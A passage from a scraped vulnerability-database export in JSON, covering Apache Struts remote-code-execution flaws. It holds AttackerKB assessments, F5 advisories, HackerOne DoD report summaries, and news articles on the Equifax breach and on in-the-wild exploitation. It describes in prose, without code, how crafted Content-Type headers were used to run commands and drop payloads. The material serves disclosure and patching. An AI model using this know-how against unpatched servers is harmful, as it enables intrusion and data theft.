[CVE-2017-5638](<https://attackerkb.com/topics/1MWtVe9P7w/cve-2017-5638>) and [CVE-2018-11776](<https://attackerkb.com/topics/jgIUjIdFUR/cve-2018-11776>) on the exploitability scale, from most exploitable to least: a parser flaw, a configuration flaw, and a programming flaw.\n\nSo, definitely patch this, but also follow Struts development best practices, including those outlined in their security bulletins. No measure of mitigations will protect you from poorly written code.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 2\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-14T00:00:00", "type": "attackerkb", "title": "CVE-2019-0230", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638", "CVE-2018-11776", "CVE-2019-0230"], "modified": "2023-10-07T00:00:00", "id": "AKB:289DC3CE-ED8A-4366-89F0-46E148584C36", "href": "https://attackerkb.com/topics/mcp2xl4Va9/cve-2019-0230", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-10-18T16:42:46", "description": "The Jakarta Multipart parser in Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 has incorrect exception handling and error-message generation during file-upload attempts, which allows remote attackers to execute arbitrary commands via a crafted Content-Type, Content-Disposition, or Content-Length HTTP header, as exploited in the wild in March 2017 with a Content-Type header containing a #cmd= string.\n\n \n**Recent assessments:** \n \n**wvu-r7** at September 03, 2020 4:29pm UTC reported:\n\nThis popped Equifax. Vulnerable versions of Struts are exploitable out of the box, since this was a parser flaw. Make sure this is patched!\n\n**hrbrmstr** at May 12, 2020 7:45pm UTC reported:\n\nThis popped Equifax. Vulnerable versions of Struts are exploitable out of the box, since this was a parser flaw. Make sure this is patched!\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2017-03-11T00:00:00", "type": "attackerkb", "title": "CVE-2017-5638", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2023-10-05T00:00:00", "id": "AKB:BDF59C15-D64F-45D5-B1AC-D1B9DD354080", "href": "https://attackerkb.com/topics/1MWtVe9P7w/cve-2017-5638", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-10-18T16:38:48", "description": "A buffer overflow vulnerability in SonicOS allows a remote attacker to cause Denial of Service (DoS) and potentially execute arbitrary code by sending a malicious request to the firewall. This vulnerability affected SonicOS Gen 6 version 6.5.4.7, 6.5.1.12, 6.0.5.3, SonicOSv 6.5.4.v and Gen 7 version 7.0.0.0.\n\n \n**Recent assessments:** \n \n**ccondon-r7** at October 15, 2020 10:48pm UTC reported:\n\nThere\u2019s high attacker value here if an attacker A) wants to cause a little mayhem, and/or B) can actually turn the DoS into reliable RCE. The first option is probably the likelier outcome in the immediate future. If [Positive Technologies](<https://twitter.com/ptswarm/status/1316838270538575877>) or Tripwire releases a PoC, the likelihood of broad exploitation probably rises significantly. For now, \u201cpatch fast but don\u2019t panic\u201d is good advice, as it always is with VPNs. There\u2019s full analysis for this bug in the [Rapid7 Analysis tab here](<https://attackerkb.com/topics/WzuBknGmx1/cve-2020-5135#rapid7-analysis>).\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-12T00:00:00", "type": "attackerkb", "title": "CVE-2020-5135", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5135"], "modified": "2023-10-07T00:00:00", "id": "AKB:1C1E9FA5-A4DB-4CE8-8770-2431CE166358", "href": "https://attackerkb.com/topics/WzuBknGmx1/cve-2020-5135", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-20T23:33:10", "description": "Forced OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code execution. Affected software : Apache Struts 2.0.0 \u2013 Struts 2.5.25.\n\n \n**Recent assessments:** \n \n**wvu-r7** at December 08, 2020 6:53pm UTC reported:\n\nSee my [assessment](<https://attackerkb.com/assessments/92642728-1fa2-4a4e-9750-297f18f0cc0b>) on [CVE-2019-0230](<https://attackerkb.com/topics/mcp2xl4Va9/cve-2019-0230>). [Apache themselves](<https://cwiki.apache.org/confluence/display/WW/S2-061>) said this is similar to [S2-059](<https://cwiki.apache.org/confluence/display/WW/S2-059>).\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 2\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-12-11T00:00:00", "type": "attackerkb", "title": "CVE-2020-17530", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230", "CVE-2020-17530"], "modified": "2020-12-15T00:00:00", "id": "AKB:CF76EF1F-CB59-4A29-ADB1-DA37C695142B", "href": "https://attackerkb.com/topics/LdoHePCiRm/cve-2020-17530", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "f5": [{"lastseen": "2023-02-08T16:15:37", "description": " * [CVE-2020-17530](<https://vulners.com/cve/CVE-2020-17530>) \nForced OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code execution. Affected software : Apache Struts 2.0.0 - Struts 2.5.25.\n * [CVE-2021-31805](<https://vulners.com/cve/CVE-2021-31805>) \nThe fix issued for CVE-2020-17530 was incomplete. So from Apache Struts 2.0.0 to 2.5.29, still some of the tag's attributes could perform a double evaluation if a developer applied forced OGNL evaluation by using the %{...} syntax. Using forced OGNL evaluation on untrusted user input can lead to a Remote Code Execution and security degradation.\n\nImpact\n\nUsing a forced Object-Graph Navigation Language (OGNL) evaluation on untrusted user input allows an attacker to perform remote code execution leading to security degradation.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-12-22T01:45:00", "type": "f5", "title": "Apache Struts vulnerabilities CVE-2020-17530 and CVE-2021-31805", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230", "CVE-2019-0233", "CVE-2020-17530", "CVE-2021-31805"], "modified": "2022-04-15T23:18:00", "id": "F5:K24608264", "href": "https://support.f5.com/csp/article/K24608264", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-24T12:56:14", "description": "The Jakarta Multipart parser in Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 has incorrect exception handling and error-message generation during file-upload attempts, which allows remote attackers to execute arbitrary commands via a crafted Content-Type, Content-Disposition, or Content-Length HTTP header, as exploited in the wild in March 2017 with a Content-Type header containing a #cmd= string. ([CVE-2017-5638](<https://vulners.com/cve/CVE-2017-5638>))\n\nImpact\n\nThere is no impact; F5 products are not affected by this vulnerability.\n\n**Note**: For information about using an iRule to protect your web servers behind the BIG-IP virtual server, refer to the **Security Advisory Recommended Actions** section.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2017-03-09T20:36:00", "type": "f5", "title": "Apache Struts 2 vulnerability CVE-2017-5638", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2022-02-14T17:54:00", "id": "F5:K43451236", "href": "https://support.f5.com/csp/article/K43451236", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "hackerone": [{"lastseen": "2023-08-01T00:57:28", "bounty": 0.0, "description": "A remote code execution (RCE) vulnerability was found on a DoD website which could have enabled an attacker to execute remote commands on the web server. Thank you @n0rb3r7 for notifying us of this vulnerability!\nI was able to leverage a recent, well-known vulnerability to achieve arbitrary, remote command execution on a U.S. Department Of Defense server.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2017-03-13T04:14:12", "type": "hackerone", "title": "U.S. Dept Of Defense: Remote code execution vulnerability on a DoD website", "bulletinFamily": "bugbounty", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2017-07-03T18:23:05", "id": "H1:212985", "href": "https://hackerone.com/reports/212985", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-07-06T16:00:44", "bounty": 0.0, "description": "A remote code execution (RCE) vulnerability was found on a DoD website which could have enabled an attacker to execute remote commands on the web server. @0daystolive and @dly were able to demonstrate this vulnerability by developing a custom script that caused the webserver to execute a benign command. This was a very clever demonstration. Thank you!", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2017-03-13T13:22:29", "type": "hackerone", "title": "U.S. Dept Of Defense: Remote Code Execution (RCE) in a DoD website", "bulletinFamily": "bugbounty", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2017-05-31T21:36:13", "id": "H1:213069", "href": "https://hackerone.com/reports/213069", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-01T01:06:10", "bounty": 0.0, "description": "A remote code execution (RCE) vulnerability was found on a DoD website which could have enabled an attacker to execute remote commands on the web server. @0daystolive and @dly were able to demonstrate this vulnerability by developing a custom script that caused the webserver to execute a benign command. This was a very clever demonstration. Thank you!", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2017-03-09T17:59:08", "type": "hackerone", "title": "U.S. Dept Of Defense: Remote Code Execution (RCE) in a DoD website", "bulletinFamily": "bugbounty", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2017-06-01T14:48:16", "id": "H1:212022", "href": "https://hackerone.com/reports/212022", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2022-05-09T12:40:51", "description": "[![consumer credit reporting Equifax data breach](https://thehackernews.com/images/-1V4miBZKvxA/W6OU7pQw5sI/AAAAAAAAyLM/GdXx9FNEs_UiDXCnBFucDDfdR_AGIzUkwCLcBGAs/s728-e100/equifax-data-breach.jpg)](<https://thehackernews.com/images/-1V4miBZKvxA/W6OU7pQw5sI/AAAAAAAAyLM/GdXx9FNEs_UiDXCnBFucDDfdR_AGIzUkwCLcBGAs/s728-e100/equifax-data-breach.jpg>)\n\nAtlanta-based consumer credit reporting agency Equifax has been issued a \u00a3500,000 fine by the UK's privacy watchdog for its last year's [massive data breach](<https://thehackernews.com/2017/09/equifax-credit-report-hack.html>) that exposed personal and financial data of hundreds of millions of its customers. \n \nYes, \u00a3500,000\u2014that's the maximum fine allowed by the UK's Data Protection Act 1998, though the penalty is apparently a small figure for a $16 billion company. \n \nIn July this year, the UK's data protection watchdog issued the maximum allowed fine of [\u00a3500,000 on Facebook](<https://thehackernews.com/2018/07/facebook-cambridge-analytica.html>) over the [Cambridge Analytica scandal](<https://thehackernews.com/2018/03/facebook-cambridge-analytica.html>), saying the social media giant Facebook failed to prevent its citizens' data from falling into the wrong hands. \n \n\n\n## Flashback: The Equifax Data Breach 2017\n\n \nEquifax suffered a massive data breach last year between mid-May and the end of July, exposing highly [sensitive data of as many as 145 million people](<https://thehackernews.com/2017/10/equifax-credit-security-breach.html>) globally. \n \nThe stolen information included victims' names, dates of birth, phone numbers, driver's license details, addresses, and social security numbers, along with credit card information and personally identifying information (PII) for hundreds of thousands of its consumers. \n \nThe data breach occurred because the company failed to patch a [critical Apache Struts 2 vulnerability](<https://thehackernews.com/2017/09/equifax-apache-struts.html>) ([CVE-2017-5638](<https://thehackernews.com/2017/03/apache-struts-framework.html>)) on time, for which patches were already issued by the respected companies. \n \n\n\n## Why U.K. Has Fined a US Company?\n\n \nThe UK's Information Commissioner's Office (ICO), who launched a joint investigation into the breach with the Financial Conduct Authority, has now [issued](<https://ico.org.uk/about-the-ico/news-and-events/news-and-blogs/2018/09/credit-reference-agency-equifax-fined-for-security-breach/>) its largest possible monetary penalty under the country's Data Protection Act for the massive data breach\u2014\u00a3500,000, which equals to around $665,000. \n \nThe ICO said that although the [cyber attack compromised Equifax](<https://thehackernews.com/2017/09/equifax-data-breach.html>) systems in the United States, the company \"failed to take appropriate steps\" to protect the personal information of its 15 million UK customers. \n \nThe ICO investigation revealed \"multiple failures\" at the company like keeping users' personal information longer than necessary, which resulted in: \n\n\n * 19,993 UK customers had their names, dates of birth, telephone numbers and driving license numbers exposed.\n * 637,430 UK customers had their names, dates of birth and telephone numbers exposed.\n * Up to 15 million UK customers had names and dates of birth exposed.\n * Some 27,000 Britishers also had their Equifax account email addresses swiped.\n * 15,000 UK customers also had their names, dates of birth, addresses, account usernames and plaintext passwords, account recovery secret questions, and answers, obscured credit card numbers, and spending amounts stolen by hackers.\n \n\n\n## Breach Was Result of Multiple Failures at Equifax\n\n \nThe ICO said that Equifax had also been warned about a [critical Apache Struts 2 vulnerability](<https://thehackernews.com/2017/03/apache-struts-framework.html>) in its systems by the United States Department of Homeland Security (DHS) in March 2017, but the company did not take appropriate steps to fix the issue. \n \nInitially, it was also reported that the company kept news of the [breach hidden for a month](<https://thehackernews.com/2017/09/equifax-credit-report-hack.html>) after its internal discovery, giving three senior executives at Equifax time to sell almost $2 million worth of its shares, though the company denied such claims. \n \nSince the data breach happened before the EU's General Data Protection Regulation (GDPR) took effect in May 2018, the maximum fine of \u00a3500,000 imposed under the UK's old Data Protection Act 1998 is still lesser. \n \nThe penalty could have been much larger had it fallen under GDPR, wherein a company could face a [maximum fine of 20 million euros](<https://thehackernews.com/2017/08/data-breach-security-law.html>) or 4 percent of its annual global revenue, whichever is higher, for such a privacy breach. \n \nIn response to the ICO's penalty, Equifax said that the company has fully cooperated with the ICO throughout the investigation that it is \"disappointed in the findings and the penalty.\" \n \nEquifax received the Monetary Penalty Notice from the ICO on Wednesday and can appeal the penalty.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-09-20T13:54:00", "type": "thn", "title": "UK Regulator Fines Equifax \u00a3500,000 Over 2017 Data Breach", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2018-09-20T13:54:52", "id": "THN:AF93AEDBDE6169AD1163D53979A4EA04", "href": "https://thehackernews.com/2018/09/equifax-credit-reporting-breach.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-27T09:17:16", "description": "[![New Apache Struts Zero-Day Vulnerability Being Exploited in the Wild](https://4.bp.blogspot.com/-YbGPFiDfo54/WMFEMrkhUUI/AAAAAAAArt0/axO9fhieprw6xBp0DoBNdECPB4t_le8uwCLcB/s1600/apache-struts-framework.png)](<https://4.bp.blogspot.com/-YbGPFiDfo54/WMFEMrkhUUI/AAAAAAAArt0/axO9fhieprw6xBp0DoBNdECPB4t_le8uwCLcB/s1600/apache-struts-framework.png>)\n\nSecurity researchers have discovered a Zero-Day vulnerability in the popular Apache Struts web application framework, which is being actively exploited in the wild. \n \nApache Struts is a free, open-source, Model-View-Controller (MVC) framework for creating elegant, modern Java web applications, which supports REST, AJAX, and JSON. \n \nIn a [blog post](<http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html>) published Monday, Cisco's Threat intelligence firm Talos announced the team observed a number of active attacks against the zero-day vulnerability (CVE-2017-5638) in Apache Struts. \n \nAccording to the researchers, the issue is a remote code execution vulnerability in the Jakarta Multipart parser of Apache Struts that could allow an attacker to execute malicious commands on the server when uploading files based on the parser. \n\n\n> \"It is possible to perform an RCE attack with a malicious Content-Type value,\" [warned](<https://cwiki.apache.org/confluence/display/WW/S2-045>) Apache. \"If the Content-Type value isn't valid an exception is thrown which is then used to display an error message to a user.\"\n\nThe vulnerability, documented at Rapid7's Metasploit Framework [GitHub site](<https://github.com/rapid7/metasploit-framework/issues/8064>), has been patched by Apache. So, if you are using the Jakarta-based file upload Multipart parser under Apache Struts 2, you are advised to upgrade to Apache Struts version 2.3.32 or 2.5.10.1 immediately. \n \n\n\n### Exploit Code Publicly Released\n\n \nSince the Talos researchers detected public proof-of-concept (PoC) exploit code (which was uploaded to a Chinese site), the vulnerability is quite dangerous. \n \nThe researchers even detected \"a high number of exploitation events,\" the majority of which seem to be leveraging the publicly released PoC that is being used to run various malicious commands. \n\n\n[![apache-exploit-code](https://2.bp.blogspot.com/-OMaYI0kDfZk/WME-W6XvmwI/AAAAAAAArtc/4rw52IxHjJYLJOlufdQEoxxQwjYWAbGmQCLcB/s1600/apache-exploit-code.png)](<https://2.bp.blogspot.com/-OMaYI0kDfZk/WME-W6XvmwI/AAAAAAAArtc/4rw52IxHjJYLJOlufdQEoxxQwjYWAbGmQCLcB/s1600/apache-exploit-code.png>)\n\nIn some cases, the attackers executed simple \"whoami\" commands to see if the target system is vulnerable, while in others, the malicious attacks turned off firewall processes on the target and dropped payloads. \n\n\n[![apache-exploit](https://2.bp.blogspot.com/-1fS7Z-ZsPgA/WME-E_vWvTI/AAAAAAAArtY/k_8FmAtSwaU9ICPEjN1gQMTdPHsQSRyFACLcB/s1600/apache-exploit.png)](<https://2.bp.blogspot.com/-1fS7Z-ZsPgA/WME-E_vWvTI/AAAAAAAArtY/k_8FmAtSwaU9ICPEjN1gQMTdPHsQSRyFACLcB/s1600/apache-exploit.png>)\n\n \n\n\n> \"Final steps include downloading a malicious payload from a web server and execution of said payload,\" the researchers say. \"The payloads have varied but include an IRC bouncer, a DoS bot, and a sample related to the Bill Gates botnet... A payload is downloaded and executed from a privileged account.\"\n\nAttackers also attempted to gain persistence on infected hosts by adding a binary to the boot-up routine. \n \nAccording to the researchers, the attackers tried to copy the file to a benign directory and ensure_ \"that both the executable runs and that the firewall service will be disabled when the system boots.\"_ \n \nBoth Cisco and Apache researchers urge administrators to upgrade their systems to Apache Struts version 2.3.32 or 2.5.10.1 as soon as possible. Admins can also switch to a different [implementation](<https://cwiki.apache.org/confluence/display/WW/File+Upload#FileUpload-AlternateLibraries>) of the Multipart parser.\n", "cvss3": {}, "published": "2017-03-09T01:03:00", "type": "thn", "title": "New Apache Struts Zero-Day Vulnerability Being Exploited in the Wild", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-09T12:03:10", "id": "THN:2707247140A4F620671B33D68FEB1EA9", "href": "https://thehackernews.com/2017/03/apache-struts-framework.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-27T09:17:53", "description": "[![equifax-credit-security-breach](https://4.bp.blogspot.com/-7t3BApLnYmI/WdM9FFq_vsI/AAAAAAAAATQ/KVrOmkm6SzoTm_8rLuSGnUbnhJudoRXwwCLcBGAs/s1600/equifax-data-breach.png)](<https://4.bp.blogspot.com/-7t3BApLnYmI/WdM9FFq_vsI/AAAAAAAAATQ/KVrOmkm6SzoTm_8rLuSGnUbnhJudoRXwwCLcBGAs/s1600/equifax-data-breach.png>)\n\n[Equifax data breach](<https://thehackernews.com/2017/09/equifax-data-breach.html>) was bigger than initially reported, exposing highly sensitive information of more Americans than previously revealed. \n \nCredit rating agency Equifax says an additional 2.5 million U.S. consumers were also impacted by the massive data breach the company disclosed last month, bringing the total possible victims to 145.5 million from 143 million. \n \nEquifax last month announced that it had suffered a massive data breach that exposed highly sensitive data of hundreds of millions of its customers, which includes names, social security numbers, dates of birth and addresses. \n \nIn addition, credit card information for [nearly 209,000 customers](<https://thehackernews.com/2017/09/equifax-credit-report-hack.html>) was also stolen, as well as certain documents with personally identifying information (PII) for approximately 182,000 Equifax consumers. \n \nThe breach was due to a critical vulnerability ([CVE-2017-5638](<https://thehackernews.com/2017/03/apache-struts-framework.html>)) in Apache Struts 2 framework, which Apache patched over two months earlier (on March 6) of the security incident. \n \nEquifax was even [informed by the US-CERT](<https://thehackernews.com/2017/09/equifax-apache-struts.html>) on March 8 to patch the flaw, but the company failed to identified or patched its systems against the issue, Equifax ex-CEO Richard Smith said in a statement [[PDF](<http://docs.house.gov/meetings/IF/IF17/20171003/106455/HHRG-115-IF17-Wstate-SmithR-20171003.pdf>)] to the House Committee on Energy and Commerce. \n\n\n> \"It appears that the breach occurred because of both human error and technology failures,\" Smith said. \"Equifax's information security department also ran scans that should have identified any systems that were vulnerable to the Apache Struts issue...Unfortunately, however, the scans did not identify the Apache Struts vulnerability.\"\n\nIn the wake of the security incident, the company hired FireEye-owned security firm Mandiant to investigate the breach, which has now concluded the forensic portion of its investigation and plans to release the results \"promptly.\" \n \nMandiant said a total of 145.5 million consumers might now potentially have been [impacted by the breach](<https://thehackernews.com/2017/09/equifax-data-breach.html>), which is 2.5 million more than previously estimated. However, the firm did not identify any evidence of \"new attacker activity.\" \n\n\n> \"Mandiant did not identify any evidence of 